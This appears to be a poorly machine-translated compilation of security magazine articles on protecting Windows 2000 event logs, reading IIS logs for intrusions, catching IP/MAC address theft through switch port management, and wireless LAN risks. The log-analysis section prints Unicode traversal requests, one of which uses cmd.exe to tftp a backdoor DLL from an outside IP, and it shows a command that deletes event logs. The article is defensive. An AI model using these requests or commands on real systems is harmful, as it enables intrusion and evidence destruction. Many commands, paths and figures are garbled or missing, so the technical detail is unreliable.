Protection and Analysis of Windows "black box"

Windows is favored by network administrators for its ease of use. A considerable number of large websites in China are built on Windows 2000/XP. There are more people using Windows and more people studying its security. Here, I would like to remind network administrators that although you have completed all the security patches, who knows when new vulnerabilities will be discovered? Therefore, we should also do a good job of protecting system logs.
As hackers, they are also most concerned about system logs. Once they successfully intrude into the system, the first thing to do is to delete your log files so that you cannot track hacker behavior after being intruded, and checks the operations performed by hackers. Log files are as important as the "black box" in an airplane because they store all the evidence of hacker intrusion.

Log migration and protection

Windows 2000 system log files include: ApplicationProgramLogs, security logs, system logs, DNS service logs, and FTP connection logs and httpd logs. By default, the log file size is KB. The default log storage location is as follows:
Security log file: % SystemRoot % \ system32 \ config \ secevent. EVT
System log file: % SystemRoot % \ system32 \ config \ sysevent. EVT
Application Log File: % SystemRoot % \ system32 \ config \ appevent. EVT
FTP connection log and httpd transaction log: % SystemRoot % \ system32 \ logfiles \. The following sub-folders are available for FTP and Web Service logs respectively. The suffix is. log.
Here I refer to the log files with the. EVT extension by default as Event Logs.ArticleThis section describes how to effectively protect Event Log shifting. Although shift is a protection method, you only need to input dir c: \ * in the command line :\*. EVT/s (if the system is installed on disk D, the drive letter is d). You can find the location of the event log. The log shift is completed by modifying the Registry. We find the HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Services \ Eventlog location in the registry, and the following application, security, and system sub-keys, corresponding to "application logs", "security logs", and "system logs" respectively ". To modify the registry, let's take a look at the application subkey, 1.

Figure 1

File is the location where the "Application log" file is stored. Change this key value to the folder where we want to store the log file, and then change % SystemRoot % \ system32 \ config \ appevent. copy the EVT file to this folder and restart the machine. The purpose of this article is to take full advantage of the "Security" attribute of Windows 2000 in the NTFS format. If the file is not moved, security settings cannot be performed on the file, right-click the folder after the shift and select "properties" to go to the "Security" tab. Do not select "allow propagation of inherited permissions from the parent" to add a "system" group, grant the "read" permission to the Everyone group, and select the "full control" and "modify" permissions for the system group. Then change the default log file size to the desired size, for example, 20 mb.
After the above settings are complete, you can directly use del c :\*. EVT/S/Q cannot be deleted. The command above is used to delete the record files being used by the system in the command line format.

Log file backup

WMI-based Log backup script
WMI (Windows Management Instrumentation) is a Windows system management tool provided by Microsoft. All scripts developed based on WMI can run successfully on Windows 2000/NT. Microsoft provides a script to Use WMI to set the log file size to 25 MB and allow the log to automatically overwrite the log 14 days ago. (Editor's note: Due to space limitations, the script will not be published. Readers and friends who need it should go to the Microsoft website or ask for it from the editor .)
We only need to save the script. files with the vbs extension can be used. We can also modify the above script to back up log files. I suggest you change the EVT suffix to another suffix during log backup (for example. c) the purpose is to make it difficult for attackers to find it.

Backup Using dumpel
You can use dumpel.exe in the Microsoft Resource kittool to back up log files in the following format:
Dumpel-F file [-S \ Server] [-l log [-M source] [-e N1 N2 N3.] [-R] [-T] [-dx]
-S \ Server outputs remote computer logs. If it is local, this can be omitted.
-F filename: location and file name of the output log.
-L log can be system, security, application, or DNS.
To transfer system logs on the target server to systemlog. log, you can use the following format:
Dumpel \ Server-L system-F systemlog. Log
You can use scheduled tasks to regularly back up system logs.

Httpd transaction log analysis

Since Microsoft's IIS 5 was published, many vulnerabilities have been exploited by hackers, such. IDA /. idq, Unicode, webdavx3, and some unknown vulnerabilities, we back up logs to analyze hacker intrusions, the following table lists the successful intrusion logs of systems without patch packages.

Unicode vulnerability intrusion Logging
Open the iis5 Web Service Log file, which is located in the % SystemRoot % \ system32 \ logfiles \ folder by default. 2 shows a log record of typical Unicode vulnerability intrusion, for normal web access, you can use the GET command on port 80 to obtain web data. However, you can bypass character verification by using invalid character encoding to obtain information that is not expected. However, you can add the corresponding patch to block this hole.

Figure 2

For example, you can use the following encoding to view the directory file of the target machine:
GET/_ vti_bin/... % 5c.../... % 5c.../... % 5c ../winnt/system32/cmd.exe/C + dir 200
This access behavior is recorded in the log:
2003-001 08:47:47 192.168.0.1-192.168.0.218 80 get/_ vti_bin /.. % 5c .. /.. % 5c .. /.. % 5c .. /winnt/system32/cmd.exe/C + dir 200-
However, our logs clearly show that attackers from 192.168.0.1 can view our directories. The following line transmits a backdoor program record to our machine:
2003-001 08:47:47 192.168.0.1-192.168.0.218 80 get/_ vti_bin /.. % 5c .. /.. % 5c .. /.. % 5c .. /winnt/system32/cmd.exe/C + tftp % 20-i % 2061.48.10.129% 20GET % 20cool. dll % 20c: \ httpodbc. DLL 502-

Webdavx3 remote overflow Logging
Recently, the well-known wevdavx3 vulnerability in the hacker community is the most widely used. Even systems with the latest SP3 patch will not be spared. If the system suffers this remote overflow attack, log 3 is shown.

Figure 3

We can see this line of information in the figure:
2003-04-18 07:20:13 192.168.0.218-192.168.0.218 80 lock
/AAAAA ......
It indicates that our web service is under attack from 192.168.0.218, and the Web Service is locked (that is, disabled. Some garbled characters are the offset bit guessing process used in overflow attacks.
The above records the IP addresses of intrusions. This IP address cannot be ruled out as a stepping stone for attackers. That is to say, this IP address may be a "zombie" rather than an attacker's IP address, however, it is still possible to trace the attacker's location by checking other log files.
However, at the end of the article, I would like to say that it is best to install a _ blank "> firewall to record and block hacker behavior.
Optimistic about your IP address
-- Manage vswitch ports to prevent IP address theft
■ Beijing Gao xiuxia
At present, IP address theft is very common. Many "attackers" use address theft to avoid tracking and hiding their own identities. IP address theft infringes on the rights and interests of normal network users and has a huge negative impact on network security and normal network operation, identifying effective preventive measures is an urgent issue.

Common Methods for IP address theft and their prevention mechanisms

IP address theft refers to the use of unauthorized IP addresses to configure computers on the Internet. There are two methods for IP address theft:
First, you can simply modify the IP address for theft. If you use an IP address that is not obtained legally When configuring or modifying the configuration, IP address theft is formed. Because an IP address is a protocol logical address and a value that needs to be set and modified at any time, you cannot modify the IP address of the local machine.
The second is to modify the IP-MAC address at the same time. For the problem of simply modifying the IP address, many units are using IP-MAC bundling technology to solve. But IP-MAC bundling technology cannot prevent users from modifying the IP-MAC. The MAC address is the hardware address of the network device. For Ethernet, it is also known as the NIC address. The MAC address on each Nic must be unique among all Ethernet devices. It is allocated by IEEE and fixed on the NIC. However, some MAC addresses compatible with NICs can be modified through the configuration program. If you change the IP address and MAC address of a computer to the IP address and MAC address of another legitimate host, then the IP-MAC bundling technology is powerless. In addition, for some NICs whose MAC addresses cannot be directly modified, you can also modify the MAC address through the software, that is, by modifying the underlying network software to spoof the upper-layer software.
At present, it is found that the commonly used method of IP address theft is to regularly scan the ARP (Address Resolution Protocol) Table of the routers of the network, get the current IP address and the IP-MAC control relationship, and the valid IP address table, the IP-MAC table compares, if inconsistent, there is an illegal access behavior. In addition, you can also detect IP address theft from the user's fault report (a message indicating a MAC address conflict occurs when an IP address is being stolen. On this basis, the common prevention mechanisms include: IP-MAC binding technology, proxy server technology, IP-MAC-USER authentication and authorization and transparent gateway technology.
These mechanisms have certain limitations, such as IP-MAC bundling technology user management is very difficult; transparent gateway technology requires a dedicated machine for data forwarding, the machine is easy to become a bottleneck. More importantly, these mechanisms do not completely prevent the damage caused by IP address theft. They only prevent IP address theft from directly accessing external network resources. As a matter of fact, because the IP address hacker still has the freedom to completely act in the IP subnet, on the one hand, this behavior will interfere with the use of legitimate users: on the other hand, attackers may exploit this vulnerability to attack other machines and network devices in the subnet. If a proxy server exists in the subnet, hackers can also obtain out-of-network resources through various means.

Use Port location and block IP address theft

A vswitch is the main network device of a LAN. It works on the data link layer and forwards and filters packets based on MAC addresses. Therefore, each vswitch maintains a MAC address table corresponding to the port. The MAC addresses of any host directly connected to a vswitch or in the same broadcast domain are saved in the MAC address table of the vswitch. The SNMP (Simple Network Management Protocol) management station can communicate with the SNMP proxy of each switch to obtain the MAC address table corresponding to the port saved by each switch, to form a real-time switch-Port-Mac table. Compare the Real-Time Switch-Port-Mac table with the obtained valid complete table to quickly detect whether the switch port has an invalid MAC address, you can further determine whether IP address theft has occurred. If the same MAC address appears on the non-cascade ports of different switches at the same time, it means that the IP-MAC is stolen in pairs.
after detecting address theft, the system has actually located the port of the switch. Then, you can query the complete switch-Port-Mac table created in advance to immediately locate the room where theft occurs.
after an address theft occurs, you can immediately take appropriate measures to block the impact of the theft, technically, the SNMP management station can send an SNMP message to the switch proxy to shut down the port where the IP address is stolen. In this way, the machine that steals the IP address cannot have any connection with other machines in the network, of course, it cannot affect the normal operation of other machines.
you can change the management status of port shutdown. In the MIB (Management Information Base), there is a read/write object ifadminstatus (Object ID number is 1.3.6.1.2.1.2.2.1.7) that represents the port management status. You can assign different values to ifadminstatus to change the port management status, that is, "1"-enable port, "2"-disable port, and "3"-for testing.
in this way, the management station can send a set request to the vswitch to disable and enable the corresponding port, for example, to disable a vswitch (192.168.1.1) you can send the following information to the vswitch:
set ("private" 192.168.1.1 1.3.6.1, 2.1.2.2.1.7.2.0.2 ).
combined with the IP-MAC binding technology, through the switch port management, you can quickly find and block the IP address theft in actual use, especially to solve the problem of IP-MAC pair theft, at the same time, it does not affect the network operation efficiency.

Wireless LAN:
There are many thieves.
■ Xiamen
Wireless LAN (WLAN) is now more and more widely used, but the security of Wireless LAN has some hidden dangers, many of which are thieves. Any wireless access device (AP; Access Point) and ad hoc networks that are directly interconnected between computers are all big gaps in enterprise information security. Next we will crack it.

Unauthorized AP
Unauthorized Wireless Access Point (AP) is the biggest threat to information leakage today. The uncontrolled AP has almost no basic Wired Equivalent Privacy (WEP) encryption function. In addition, even with WEP, attackers can use airsnort and netstumbler to intercept information on the WLAN over the company network. The company must set up regulations to punish those who set up APS without authorization. The company must first strengthen the protection of information security and adopt multi-layer protection methods to defend against all intrusions.

Uncontrolled wireless laptop Network
Unauthorized wireless network devices are entering the enterprise through various wireless technologies. Intel's new intel Centrino wireless chip allows all new laptops to be equipped with WLAN devices, all of which require security protection detection. Unauthorized WLAN platforms must have protective measures to prevent users from being connected to unknown WLANs or hacker computers, which may cause computer data theft. An intruded WLAN may be a gap in the security of enterprises' large computer networks.

Ad Hoc Network
Like an uncontrolled AP, the security of ad hoc wireless networks is also worrying. Because network administrators cannot control the information security of laptops computers at all. The wlancard allows information exchange between laptops even if there is no AP. These ad hoc networks allow two computers to freely transfer information. When the wlancard operates in ad hoc mode, the user basically trusts all platforms within the radio wave range. Ad hoc networks provide very little authentication management and security protection. Malicious platforms can directly connect users on the ad hoc network and thus connect to the enterprise network.

When the data transmission rate is too slow
An 802.11b WLAN should be able to provide enterprise users with 5-5 Mbps or 11 Mbps transmission traffic. If only a slow speed such as 1 Mbps or 2 Mbps is provided, hackers may be conducting illegal activities.

Access to the virtual enterprise network (VPN) through AP without authentication)
Enterprises with security awareness will identify all users before the VPN entry. Many enterprises do not pay attention to it, so that users from WLAN can access the VPN without authentication.

Link through neighboring AP sensing
Wlan rf signals are not limited to restricted offices. It is possible that computers may inadvertently connect to the WLAN of neighboring enterprises, which may leak passwords or sensitive files to the adjacent WLAN.

Non-standard wlancard
All WLAN networks built by enterprises purchase Wi-Fi standard equipment and provide network security and management functions. Like non-standard wlancards and APS, there is a possibility of leakage.

Service Set Identifier (Service Group Identifier) leakage
The SSID (Service Set Identifier, Business Group Identifier) reflects the nature and name of the WLAN (SSIDs is publicly transmitted along with other WLAN information flows). Therefore, enterprises should be careful not to disclose information in SSIDs. SSIDs should avoid using department names, such as human resources, accounting, and engineering. This may attract hackers to search for employee files, financial information or technical information through the SSID to the WLAN.

Insecure Windows XP Automatic settings
WLAN security policies should be implemented on every wireless platform and device, but some Windows XP Automatic settings increase security risks. Laptops will actively investigate to connect to nearby AP or insecure devices, including: automatically connect to all unapproved wireless network platforms, send signals to find previously linked AP, and can communicate directly with other laptops.

Disable WLAN after work
Wlan rf signals can span buildings. Many enterprises start to restrict the use of WLAN only during work hours during the day to prevent hackers from waiting for the server at night. Therefore, the AP is disabled during non-work periods.